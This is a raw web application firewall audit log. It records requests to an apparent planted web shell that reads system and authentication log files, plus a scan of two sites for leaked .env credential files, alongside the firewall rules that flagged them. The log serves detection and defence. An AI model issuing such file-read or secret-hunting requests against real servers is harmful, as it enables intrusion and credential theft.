"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-network-security.conf found within ARGS:viewfile: /etc/sysctl.d/10-network-security.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sysctl.d/10-network-security.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-network-security.conf found within ARGS:viewfile: /etc/sysctl.d/10-network-security.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE419x6N9C2vdY7GQBU5wAAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749956087595246 4190 (- - -) Stopwatch2: 1749956087595246 4190; combined=2054, p1=324, p2=1558, p3=50, p4=37, p5=85, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b8f1203-Z-- --63f4c74b-A-- [15/Jun/2025:08:25:03.605803 +0530] aE42B7EfOI5jz-ckSxSg7wAAAAg 3.229.95.193 36394 127.0.0.1 7081 --63f4c74b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/auth.log.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.229.95.193 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --63f4c74b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --63f4c74b-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE42B7EfOI5jz-ckSxSg7wAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749956103601260 4596 (- - -) Stopwatch2: 1749956103601260 4596; combined=2558, p1=365, p2=2053, p3=39, p4=40, p5=61, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63f4c74b-Z-- --5c55cd47-A-- [15/Jun/2025:08:26:12.407132 +0530] aE42TMH4SeX80EzN5eWfGQAAAAs 185.177.72.144 60492 127.0.0.1 7081 --5c55cd47-B-- GET /.env HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5c55cd47-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --5c55cd47-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env"] [unique_id "aE42TMH4SeX80EzN5eWfGQAAAAs"] Stopwatch: 1749956172385788 21412 (- - -) Stopwatch2: 1749956172385788 21412; combined=2038, p1=365, p2=1482, p3=58, p4=56, p5=77, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5c55cd47-Z-- --929ff66a-A-- [15/Jun/2025:08:26:12.434002 +0530] aE42TLEfOI5jz-ckSxShBgAAAAg 185.177.72.144 60502 127.0.0.1 7081 --929ff66a-B-- GET /.env HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --929ff66a-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --929ff66a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env"] [unique_id "aE42TLEfOI5jz-ckSxShBgAAAAg"] Stopwatch: 1749956172416452 17630 (- - -) Stopwatch2: 1749956172416452 17630; combined=1982, p1=323, p2=1487, p3=33, p4=33, p5=106, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --929ff66a-Z-- --2e590c24-A-- [15/Jun/2025:08:26:12.541870 +0530] aE42TD9o8tFLnaQ0S_47xwAAAAQ 185.177.72.144 60528 127.0.0.1 7081 --2e590c24-B-- GET /.env.bak HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2e590c24-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --2e590c24-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||shows.tandonamit.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env.bak"] [unique_id "aE42TD9o8tFLnaQ0S_47xwAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||shows.tandonamit.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "shows.tandonamit.com"] [uri "/.env.bak"] [unique_id "aE42TD9o8tFLnaQ0S_47xwAAAAQ"] Stopwatch: 1749956172518910 23028 (- - -) Stopwatch2: 1749956172518910 23028; combined=2138, p1=389, p2=1497, p3=57, p4=55, p5=140, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2e590c24-Z-- --ebd81329-A-- [15/Jun/2025:08:26:12.576547 +0530] aE42TH2MSXWlBRpdvOiMMwAAAAk 185.177.72.144 60530 127.0.0.1 7081 --ebd81329-B-- GET /.env.bak HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ebd81329-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --ebd81329-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||showsadmin.tandonamit.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.bak"] [unique_id "aE42TH2MSXWlBRpdvOiMMwAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||showsadmin.tandonamit.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.bak"] [unique_id "aE42TH2MSXWlBRpdvOiMMwAAAAk"] Stopwatch: 1749956172559758 16851 (- - -) Stopwatch2: 1749956172559758 16851; combined=1815, p1=364, p2=1282, p3=38, p4=39, p5=92, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ebd81329-Z-- --2f464033-A-- [15/Jun/2025:08:26:12.677793 +0530] aE42TOGp91NCs5RsuUFs8QAAAAE 185.177.72.144 60534 127.0.0.1 7081 --2f464033-B-- GET /.env.example HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2f464033-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --2f464033-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env.example"] [unique_id "aE42TOGp91NCs5RsuUFs8QAAAAE"] Stopwatch: 1749956172652467 25393 (- - -) Stopwatch2: 1749956172652467 25393; combined=2103, p1=412, p2=1470, p3=59, p4=62, p5=99, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2f464033-Z-- --aa2c2456-A-- [15/Jun/2025:08:26:12.702254 +0530] aE42TD8QAuiw8zL7QHNY8gAAAAU 185.177.72.144 60548 127.0.0.1 7081 --aa2c2456-B-- GET /.env.example HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aa2c2456-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --aa2c2456-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.example"] [unique_id "aE42TD8QAuiw8zL7QHNY8gAAAAU"] Stopwatch: 1749956172686955 15381 (- - -) Stopwatch2: 1749956172686955 15381; combined=2222, p1=377, p2=1612, p3=71, p4=70, p5=91, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aa2c2456-Z-- --11ea440f-A-- [15/Jun/2025:08:26:12.811103 +0530] aE42TGydX8vZg3SgqNzUpgAAAAI 185.177.72.144 60564 127.0.0.1 7081 --11ea440f-B-- GET /.env.local HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --11ea440f-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --11ea440f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env.local"] [unique_id "aE42TGydX8vZg3SgqNzUpgAAAAI"] Stopwatch: 1749956172787607 23574 (- - -) Stopwatch2: 1749956172787607 23574; combined=2330, p1=478, p2=1660, p3=63, p4=61, p5=67, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11ea440f-Z-- --dc442c79-A-- [15/Jun/2025:08:26:12.829298 +0530] aE42TB6N9C2vdY7GQBU55wAAAAY 185.177.72.144 60572 127.0.0.1 7081 --dc442c79-B-- GET /.env.local HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dc442c79-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --dc442c79-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.local"] [unique_id "aE42TB6N9C2vdY7GQBU55wAAAAY"] Stopwatch: 1749956172812640 16768 (- - -) Stopwatch2: 1749956172812640 16768; combined=1901, p1=335, p2=1400, p3=34, p4=38, p5=93, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc442c79-Z-- --cee6f965-A-- [15/Jun/2025:08:26:12.945613 +0530] aE42TMQgjKnP_-nTjoBy7gAAAAM 185.177.72.144 60578 127.0.0.1 7081 --cee6f965-B-- GET /.env.old HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cee6f965-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --cee6f965-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||shows.tandonamit.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env.old"] [unique_id "aE42TMQgjKnP_-nTjoBy7gAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||shows.tandonamit.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "shows.tandonamit.com"] [uri "/.env.old"] [unique_id "aE42TMQgjKnP_-nTjoBy7gAAAAM"] Stopwatch: 1749956172920810 24871 (- - -) Stopwatch2: 1749956172920810 24871; combined=2257, p1=367, p2=1691, p3=34, p4=37, p5=128, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cee6f965-Z-- --03c5f010-A-- [15/Jun/2025:08:26:12.957317 +0530] aE42TMH4SeX80EzN5eWfGgAAAAs 185.177.72.144 60582 127.0.0.1 7081 --03c5f010-B-- GET /.env.old HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --03c5f010-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --03c5f010-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||showsadmin.tandonamit.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.old"] [unique_id "aE42TMH4SeX80EzN5eWfGgAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||showsadmin.tandonamit.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "showsadmin.tandonamit.com"] [uri "/.env.old"] [unique_id "aE42TMH4SeX80EzN5eWfGgAAAAs"] Stopwatch: 1749956172939239 18143 (- - -) Stopwatch2: 1749956172939239 18143; combined=1772, p1=336, p2=1219, p3=52, p4=52, p5=113, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --03c5f010-Z-- --8c2ea530-A-- [15/Jun/2025:08:26:13.080525 +0530] aE42TT9o8tFLnaQ0S_47yAAAAAQ 185.177.72.144 60598 127.0.0.1 7081 --8c2ea530-B-- GET /.env.production HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8c2ea530-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --8c2ea530-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env.production"] [unique_id "aE42TT9o8tFLnaQ0S_47yAAAAAQ"] Stopwatch: 1749956173055986 24606 (- - -) Stopwatch2: 1749956173055986 24606; combined=2119, p1=340, p2=1548, p3=52, p4=61, p5=118, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c2ea530-Z-- --96d7ce0f-A-- [15/Jun/2025:08:26:13.082548 +0530] aE42TX2MSXWlBRpdvOiMNAAAAAk 185.177.72.144 60600 127.0.0.1 7081 --96d7ce0f-B-- GET /.env.production HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip 